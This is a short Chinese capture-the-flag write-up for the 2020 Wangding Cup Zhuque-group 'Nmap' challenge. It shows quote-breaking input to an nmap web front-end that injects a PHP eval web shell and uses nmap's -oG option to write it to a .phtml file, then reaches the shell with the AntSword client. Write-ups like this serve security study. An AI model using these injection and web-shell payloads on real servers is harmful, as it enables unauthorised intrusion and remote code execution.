命令执行 [网鼎杯 2020 朱雀组]Nmap1

打开题目

输入127.0.0.1

可以得到回显结果,猜测是命令执行,尝试使用|分隔地址与命令

127.0.0.1 | ls

可以看到|\转义,尝试使用;

直接放入Payload:

' <?php @eval($_POST["hack"]);?> -oG hack.php '

尝试修改文件名后缀为phtml

' <?php @eval($_POST["hack"]);?> -oG hack.phtml '

加上扫描的地址:127.0.0.1

127.0.0.1 | ' <?= @eval($_POST["hack"]);?> -oG hack.phtml'

得到

查看扫描列表:

查看写入的文件,即访问hack.phtml

蚁剑连接

在根目录找到了flag

相关推荐
前行的小黑炭2 小时前
Android 协程的使用:结合一个环境噪音检查功能的例子来玩玩
android·java·kotlin
阿华的代码王国3 小时前
【Android】内外部存储的读写
android·内外存储的读写
inmK16 小时前
蓝奏云官方版不好用?蓝云最后一版实测:轻量化 + 不限速(避更新坑) 蓝云、蓝奏云第三方安卓版、蓝云最后一版、蓝奏云无广告管理工具、安卓网盘轻量化 APP
android·工具·网盘工具
giaoho6 小时前
Android 热点开发的相关api总结
android
咖啡の猫8 小时前
Android开发-常用布局
android·gitee
程序员老刘8 小时前
Google突然“变脸“,2026年要给全球开发者上“紧箍咒“?
android·flutter·客户端
Tans58 小时前
Androidx Lifecycle 源码阅读笔记
android·android jetpack·源码阅读
雨白9 小时前
实现双向滑动的 ScalableImageView(下)
android
峥嵘life9 小时前
Android Studio新版本编译release版本apk实现
android·ide·android studio
studyForMokey11 小时前
【Android 消息机制】Handler
android